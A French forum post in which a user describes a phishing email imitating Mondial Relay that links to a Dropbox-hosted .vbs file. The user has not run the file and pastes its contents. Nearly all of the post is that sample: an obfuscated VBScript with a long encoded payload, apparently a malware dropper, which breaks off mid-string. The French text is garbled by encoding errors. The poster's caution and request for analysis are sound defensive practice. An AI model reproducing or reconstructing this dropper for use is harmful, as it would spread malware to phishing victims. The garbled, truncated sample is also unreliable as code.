IdentifiantMot de passe
Loading...
Mot de passe oubli้ ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les r้ponses en temps r้el, voter pour les messages, poser vos propres questions et recevoir la newsletter

VBScript Discussion :

script re็u par mail


Sujet :

VBScript

  1. #1
    Membre du Club
    Homme Profil pro
    Ing้nieur d้veloppement logiciel
    Inscrit en
    F้vrier 2017
    Messages
    43
    D้tails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Seine et Marne (ฮle de France)

    Informations professionnelles :
    Activit้ : Ing้nieur d้veloppement logiciel

    Informations forums :
    Inscription : F้vrier 2017
    Messages : 43
    Points : 58
    Points
    58
    Par d้faut script re็u par mail
    Bonjour,

    J'ai re็u un mail de mondial relay (sans faute d'orthographe) pour me donner des informations quant เ mon colis.
    Je n'ai pas command้ de colis via mondial relay. Il qui me donne un lien dropbox qui me permet de t้l้charger un fichier.
    Le fichier est un .vbs. Je n'ex้cute ้videmment pas ce genre de truc louche sur mon windows.

    voici ce qu'il contient :
    Code : S้lectionner tout - Visualiser dans une fen๊tre เ part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    Dim dec,txt 
    txt ="„€pv};€yrr}-A===-4eNv„‡ZPQcbdU‡`cQ{s`oƒyfu}€z]Yp€‡gq}ePQQ`xre€}Pe…r|{-r|-r€‚zr-{r…€vVtq`…Uv|„N{xNs„{wq|_†U-J-/pu„/-4Ofr€yopTu‡\apdv„ofpXy|xyup|n}]_Tx~OcxQ‚O„zQrxƒdTRf~Pzy~VT[p€RNQzT†oesfVz-J/tr|owrp/-4‚‡Pu~XburpzTY„Zwx‚{Z†qg[†xSes€awbQPnNP‡a}}cauSs‚{pv|{-`qd„_€\gq†o…†obyT|PuYS…]5†vvux…raSZYZ„up[q{P†zzaSS6-4YpabddQbg\\Tƒb\U~sUtxPzwgXX…q_†\db_‡]fcnVv`[]€…cO--qvz-^s\fWgNPgQ|†tdzrP~~pV‚~a9-fZQ†w‡[nnntabY‡^Pwts‡reu9-{~[TtetoVxs}q…dQ~„u‚ƒyfN---^s\fWgNPgQ|†tdzrP~~pV‚~a-J-//-----„tPƒP|{‚…ƒ}uw†_ZQbV{ƒƒ-J-Yr{5†vvux…raSZYZ„up[q{P†zzaSS6---s|-fZQ†w‡[nnntabY‡^Pwts‡reu-J-?-|-„tPƒP|{‚…ƒ}uw†_ZQbV{ƒƒ---{~[TtetoVxs}q…dQ~„u‚ƒyfN-J-//----4Po…‚N†TY„Zd|v}nxpP\€€XU…Ox‡‚tz|d^|d~O€arpVtzbX…|---„uvyr-Zvq5†vvux…raSZYZ„up[q{P†zzaSS9-fZQ†w‡[nnntabY‡^Pwts‡reu9->6-IK--/‰/--n{q-fZQ†w‡[nnntabY‡^Pwts‡reu-IJ-„tPƒP|{‚…ƒ}uw†_ZQbV{ƒƒ-----{~[TtetoVxs}q…dQ~„u‚ƒyfN-J-{~[TtetoVxs}q…dQ~„u‚ƒyfN-8-Zvq5†vvux…raSZYZ„up[q{P†zzaSS9-fZQ†w‡[nnntabY‡^Pwts‡reu9->6-----fZQ†w‡[nnntabY‡^Pwts‡reu-J-fZQ†w‡[nnntabY‡^Pwts‡reu8>----„r{q----^s\fWgNPgQ|†tdzrP~~pV‚~a-J-^s\fWgNPgQ|†tdzrP~~pV‚~a-8-pu5PY{t5-pu„5>=A-:-CC6-3-pu„5?C-8-DE6-3{~[TtetoVxs}q…dQ~„u‚ƒyfN66---{r…---`qd„_€\gq†o…†obyT|PuYS…]‡-J-^s\fWgNPgQ|†tdzrP~~pV‚~a--r{q-s‚{pv|{-4d`{‚x`}„g\u~^‡snfbaXVUxc|_NOYuNOSf~dvƒrrNRbRZ{Ywpz-4}RRg\U€ta\Z`[sYVVP^]VQ{SwNtnfyYeNgP|^}Y[[aoTP-4N`ca‡}ƒƒnOws[‡{{tOUX€tbp{Rodxy|P…[~Uq`YusqozTXf[‡s€r-€RnTQt€YZV{‚x†…{nd|TX|ga-J-Rf~Pzy~VT[p€RNQzT†oesfVz5/„v{ztz€Gii/64}†anb…Sc{‡Y]{Tu‡wsx|~nR}QUbqT}„s}†QRz„xwZ^bs`{gno€r-nc[R`ysx‚WYX…nXw`€f…R~st~-J-Rf~Pzy~VT[p€RNQzT†oesfVz5/;i||ipvzƒ?/6-4qbcu††|Y~^gP|fqSg|PP[[cNPNtge~vbNvZoxv‡s^OSbXwOƒOz---nQf†Nv]Peuq€STfYx€QTad`Qb-J-€RnTQt€YZV{‚x†…{nd|TX|ga-3-nc[R`ysx‚WYX…nXw`€f…R~st~--Sw†PQ€Peq^{eW…sX`YdeUrƒn-J->EC-:-D>--y€v…cq_ea€bY[ws[qg„c^WTet-J->FF-:-FE--…RcN\VN}‡\nP_eudƒv…uX„‡s-J-/=uq/-3-/„€|@/-3-/vA{/-€r-wqfX}T{€€OX|VqS}fprf{gTQ-J-nQf†Nv]Peuq€STfYx€QTad`Qb;r…rp~‚r†5-€vVtq`…Uv|„N{xNs„{wq|_†U-35Sw†PQ€Peq^{eW…sX`YdeUrƒn6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35y€v…cq_ea€bY[ws[qg„c^WTet6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35F-7->?6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>=>-<->6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35FF=-<->=6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>>C6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35@>CE-<-FF6-3-Zvq5/yFnBy|7†y@/9D9>63-€vVtq`…Uv|„N{xNs„{wq|_†U-35>AD?-<-AC6-3--/s/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35CC-8-AE6-3--/|/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>EB@-<->D6-3--/-/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>?@-:-A6-3--/v/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35BB-7-?6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35B>6-3--/?/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35FB6-3--/}/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>>A6-3-Zvq5…RcN\VN}‡\nP_eudƒv…uX„‡s9C9>63--/p/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>@?-:-@>6-3--/€/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>>B6--99AE6--qvz-xPav]O[fQbOdPNpe{gv\Yn‚--s|-rnpu-xPav]O[fQbOdPNpe{gv\Yn‚-v{-wqfX}T{€€OX|VqS}fprf{gTQ--vs-xPav]O[fQbOdPNpe{gv\Yn‚;{nzr-J-/„/-3-Zvq5/@pp€~B?‚@@/9B9>63-Zvq5/tp@y==o„C|/9?9>63--//-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35C>FB-<-BF6-3--/}/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>>C6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35F@-:-AD6-3-Zvq5/B=rx~„E†~€w/9@9>63-Zvq5/BCC…q?w…uu‡/9E9>63-€vVtq`…Uv|„N{xNs„{wq|_†U-35DC-8-?B6---ur{--qvz-…\cƒRtxƒYgXyvOa|nx|P‡rdƒ--…\cƒRtxƒYgXyvOa|nx|P‡rdƒ-J-`qd„_€\gq†o…†obyT|PuYS…]5-/‰Q‰N‰AS‰D>‰AF‰CD‰A@‰B>‰CD‰DA‰CD‰B=‰AN‰DN‰AD‰CP‰BF‰BD‰DA‰AN‰BN‰D>‰C?‰BN‰AR‰CE‰B=‰@Q‰??‰@@‰@F‰@N‰@@‰@?‰@N‰@C‰@D‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@F‰@E‰@N‰@>‰@?‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@E‰@N‰@F‰@B‰@N‰@C‰@C‰@N‰@A‰@E‰@N‰@A‰@F‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@D‰@F‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@C‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@F‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@A‰@N‰@F‰@D‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@E‰@D‰@N‰@E‰@@‰@N‰@F‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@>‰@C‰@N‰@A‰@C‰@N‰@E‰@@‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@E‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@E‰@@‰@N‰@F‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@@‰@N‰@A‰@C‰@N‰@D‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@E‰@@‰@N‰@>‰@?‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@F‰@N‰@D‰@F‰@N‰@F‰@E‰@N‰@>‰@=‰@C‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@E‰@@‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@E‰@N‰@A‰@C‰@N‰@C‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@B‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@D‰@D‰@N‰@>‰@=‰@B‰@N‰@F‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@C‰@N‰@A‰@C‰@N‰@E‰@E‰@N‰@D‰@D‰@N‰@D‰@C‰@N‰@D‰@?‰@N‰@E‰@A‰@N‰@E‰@A‰@N‰@E‰@=‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@@‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@F‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@A‰@N‰@F‰@D‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@D‰@?‰@N‰@D‰@B‰@N‰@C‰@D‰@N‰@E‰@B‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@D‰@?‰@N‰@D‰@B‰@N‰@D‰@C‰@N‰@D‰@D‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@D‰@?‰@N‰@D‰@B‰@N‰@C‰@D‰@N‰@E‰@B‰@N‰@F‰@?‰@N‰@>‰@>‰@E‰@N‰@>‰@>‰@F‰@N‰@A‰@E‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@F‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@F‰@?‰@N‰@E‰@@‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@F‰@?‰@N‰@D‰@D‰@N‰@>‰@=‰@B‰@N‰@F‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@C‰@N‰@F‰@?‰@N‰@E‰@D‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@B‰@N‰@F‰@?‰@N‰@C‰@D‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@C‰@N‰@E‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@F‰@?‰@N‰@E‰@?‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@?‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@D‰@?‰@N‰@D‰@B‰@N‰@D‰@C‰@N‰@D‰@D‰@N‰@F‰@?‰@N‰@E‰@@‰@N‰@D‰@F‰@N‰@D‰@=‰@N‰@E‰@A‰@N‰@E‰@D‰@N‰@C‰@B‰@N‰@E‰@?‰@N‰@C‰@F‰@N‰@F‰@?‰@N‰@C‰@D‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@F‰@?‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@E‰@?‰@N‰@C‰@F‰@N‰@D‰@>‰@N‰@F‰@B‰@N‰@E‰@@‰@N‰@F‰@=‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@F‰@?‰@N‰@>‰@=‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@?‰@N‰@F‰@D‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@F‰@F‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@F‰@?‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@?‰@>‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@F‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@A‰@N‰@F‰@D‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@>‰@>‰@F‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@@‰@N‰@>‰@=‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@B‰@N‰@B‰@E‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@>‰@>‰@F‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@B‰@>‰@N‰@B‰@=‰@N‰@F‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@@‰@N‰@>‰@=‰@B‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@D‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@E‰@D‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@B‰@>‰@N‰@B‰@=‰@N‰@F‰@B‰@N‰@D‰@F‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@F‰@D‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@@‰@N‰@E‰@@‰@N‰@>‰@?‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@F‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@>‰@>‰@F‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@@‰@N‰@>‰@=‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@B‰@N‰@B‰@E‰@N‰@F‰@?‰@N‰@F‰@?‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@F‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@C‰@N‰@F‰@?‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@?‰@>‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@C‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@E‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@B‰@N‰@E‰@=‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@=‰@N‰@>‰@>‰@D‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@A‰@=‰@N‰@>‰@=‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@>‰@=‰@F‰@N‰@C‰@>‰@N‰@B‰@?‰@N‰@@‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@A‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@>‰@>‰@F‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@@‰@N‰@>‰@=‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@B‰@N‰@B‰@E‰@N‰@F‰@?‰@N‰@F‰@?‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@F‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@C‰@N‰@F‰@?‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@?‰@>‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@@‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@C‰@C‰@N‰@C‰@>‰@N‰@D‰@>‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@D‰@F‰@N‰@F‰@E‰@N‰@>‰@=‰@C‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@A‰@=‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@B‰@>‰@N‰@A‰@>‰@N‰@A‰@>‰@N‰@A‰@C‰@N‰@D‰@@‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@F‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@D‰@F‰@N‰@>‰@=‰@?‰@N‰@A‰@=‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@B‰@?‰@N‰@A‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@>‰@=‰@>‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@@‰@?‰@N‰@F‰@D‰@N‰@@‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@F‰@E‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@C‰@>‰@N‰@F‰@D‰@N‰@A‰@C‰@N‰@>‰@=‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@>‰@?‰@>‰@N‰@D‰@E‰@N‰@F‰@D‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@@‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@C‰@C‰@N‰@C‰@>‰@N‰@D‰@>‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@D‰@F‰@N‰@F‰@E‰@N‰@>‰@=‰@C‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@A‰@=‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@B‰@>‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@B‰@=‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@A‰@C‰@N‰@D‰@@‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@F‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@D‰@F‰@N‰@>‰@=‰@?‰@N‰@A‰@=‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@B‰@?‰@N‰@A‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@>‰@=‰@>‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@@‰@?‰@N‰@F‰@D‰@N‰@@‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@F‰@E‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@C‰@>‰@N‰@F‰@D‰@N‰@A‰@C‰@N‰@>‰@=‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@>‰@?‰@>‰@N‰@D‰@E‰@N‰@F‰@D‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@@‰@A‰@N‰@@‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@D‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@C‰@N‰@A‰@B‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@@‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@C‰@C‰@N‰@C‰@>‰@N‰@D‰@>‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@D‰@F‰@N‰@F‰@E‰@N‰@>‰@=‰@C‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@A‰@=‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@A‰@E‰@N‰@A‰@>‰@N‰@A‰@>‰@N‰@A‰@C‰@N‰@D‰@@‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@F‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@D‰@F‰@N‰@>‰@=‰@?‰@N‰@A‰@=‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@>‰@=‰@F‰@N‰@A‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@>‰@=‰@>‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@@‰@?‰@N‰@F‰@D‰@N‰@@‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@F‰@E‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@>‰@=‰@F‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@A‰@F‰@N‰@@‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@C‰@>‰@N‰@F‰@D‰@N‰@A‰@C‰@N‰@>‰@>‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@E‰@N‰